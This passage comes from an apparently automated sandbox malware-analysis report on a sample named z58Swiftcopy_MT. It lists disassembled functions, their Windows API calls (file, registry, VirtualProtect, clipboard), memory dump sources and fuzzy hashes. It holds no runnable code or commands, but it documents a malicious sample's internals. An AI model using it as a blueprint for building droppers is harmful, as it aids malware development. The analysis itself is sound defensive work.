                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointerwsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 327478801-0
                                                                                                                                                                                                                                      • Opcode ID: 7f4dd024d7baea7243aacb1c134d87f0f28e7bae7902d05c041a77775a735631
                                                                                                                                                                                                                                      • Instruction ID: daba68e88d81473494fab100d986bdd4d5457abcde4f4dc52411d400b48531e4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f4dd024d7baea7243aacb1c134d87f0f28e7bae7902d05c041a77775a735631
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCE09B71B04116ABD700FB95AA4997E7768DF40304F10403FF515F00C1CA7D4C025B2D
                                                                                                                                                                                                                                      Function 004022F6 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 390214022-0
                                                                                                                                                                                                                                      • Opcode ID: d24bdbc1146ceb37acbd80640b4da5ce9412419425c02070d407eaaf5c42416a
                                                                                                                                                                                                                                      • Instruction ID: f472a2c509351f333654906e099da5e6dfd11f42980ce41b172c94471a0d1cd1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d24bdbc1146ceb37acbd80640b4da5ce9412419425c02070d407eaaf5c42416a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BE01A31B401246ADB207AB10E8E96E14989BC4744B29053ABE05B62C3DDBC4C414AB9
                                                                                                                                                                                                                                      Function 00405F4D Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B72,00000000,?,?), ref: 00405F76
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                                                      • Instruction ID: b8b87f9e7f23a22b038ad66cb6348727c8887116b88fbbe418bbf9d15439b9dc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4E0E67201450DBEDF095F60DD0AD7B371DEB08304F04452EFA45D4091E7B5AD209E74
                                                                                                                                                                                                                                      Function 00405CD9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0040FA1F,0040B8D8,00403246,0040B8D8,0040FA1F,004138D8,00004000,?,00000000,00403070,00000004), ref: 00405CED
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                                      • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                                                                                                                                                                                      • Instruction ID: e5327eed263ed0cb59b3772f759b7efddda8826228879d6768eb485b7ec61b42
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEE0EC3225065AABDF509E95AD08FEB7B6CEF053A0F008837F915E2150D631E821DBA8
                                                                                                                                                                                                                                      Function 00405CAA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004138D8,0040B8D8,004032C2,0040A130,0040A130,004031C6,004138D8,00004000,?,00000000,00403070), ref: 00405CBE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                      • Opcode ID: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                                                                                                                                                                                                                                      • Instruction ID: 86bb3e2151b1fdd0dbac44507bcf00ea7ca2ece369def3772f3446380bdcc129
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAE08C3220825EABEF109E508C00EEB3B6CFB00361F144432FD10E7040E230E860ABB4
                                                                                                                                                                                                                                      Function 10002709 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002727
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696679274.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696753129.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696776514.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                                      • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                                                                                      • Instruction ID: e09dfa788fffc30199ef0a9f627684cb70e95bce5f527532b7ad3e980fb418b3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67F09BF19092A0DEF360DF688CC47063FE4E3983D5B03852AE358F6269EB7441448B19
                                                                                                                                                                                                                                      Function 0040233A Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040236D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileString
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1096422788-0
                                                                                                                                                                                                                                      • Opcode ID: e8e9dc98ecc8dc52fd3defedd6371274e224f608b56cf67719823b11c706e596
                                                                                                                                                                                                                                      • Instruction ID: 8896498bc3bf22cdd75c41d4cee83ceff5cc5a9cf36b2948d6df5d4522980b60
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8e9dc98ecc8dc52fd3defedd6371274e224f608b56cf67719823b11c706e596
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82E08634B44308BADF10AFA19D49EAD3668AF41710F14403AFD547B0E2EEB844429B2D
                                                                                                                                                                                                                                      Function 00405F1F Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,00420510,?,?,00405FAD,00420510,?,?,?,00000002,Call), ref: 00405F43
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                                      • Instruction ID: 49134d8a29c384089d71c2fc87a48e1db8574b6415c3e00dd087e3758e4bfdf5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D0EC3210420ABADF119E919D01FAB371DEB04350F004426BA45E4091D779D520AE54
                                                                                                                                                                                                                                      Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: e7fa766cc053bfdbcc21595e48a1bcd3d4c0b026ba3eff1e1b85954f558f6b14
                                                                                                                                                                                                                                      • Instruction ID: ce3aa80a16c353682a4fc60f6c60757a41c4294f2dd63ac0650dc91194aad8f9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7fa766cc053bfdbcc21595e48a1bcd3d4c0b026ba3eff1e1b85954f558f6b14
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1D0127270811197CB10DBA8AB4869D77A4EB80325B318137D515F21D1E6B9C945671D
                                                                                                                                                                                                                                      Function 004032C5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FC3,?), ref: 004032D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                      • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                                                                                      • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                                                                                                                      Function 10001215 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696679274.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696753129.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696776514.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocGlobal
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3761449716-0
                                                                                                                                                                                                                                      • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                                                                                                                                                                                      • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39

                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                      Function 004052FE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040535D
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040536C
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004053A9
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 004053B0
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004053D1
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004053E2
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 004053F5
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405403
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405416
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405438
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040544C
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040546D
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040547D
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405496
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054A2
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040537B
                                                                                                                                                                                                                                        • Part of subcall function 0040418F: SendMessageA.USER32(00000028,?,00000001,00403FBF), ref: 0040419D
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054BE
                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005292,00000000), ref: 004054CC
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004054D3
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004054F6
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004054FD
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 00405543
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405577
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00405588
                                                                                                                                                                                                                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040559D
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,000000FF), ref: 004055BD
                                                                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055D6
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405612
                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405622
                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00405628
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 00405631
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040563B
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040564F
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405668
                                                                                                                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00405673
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00405679
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
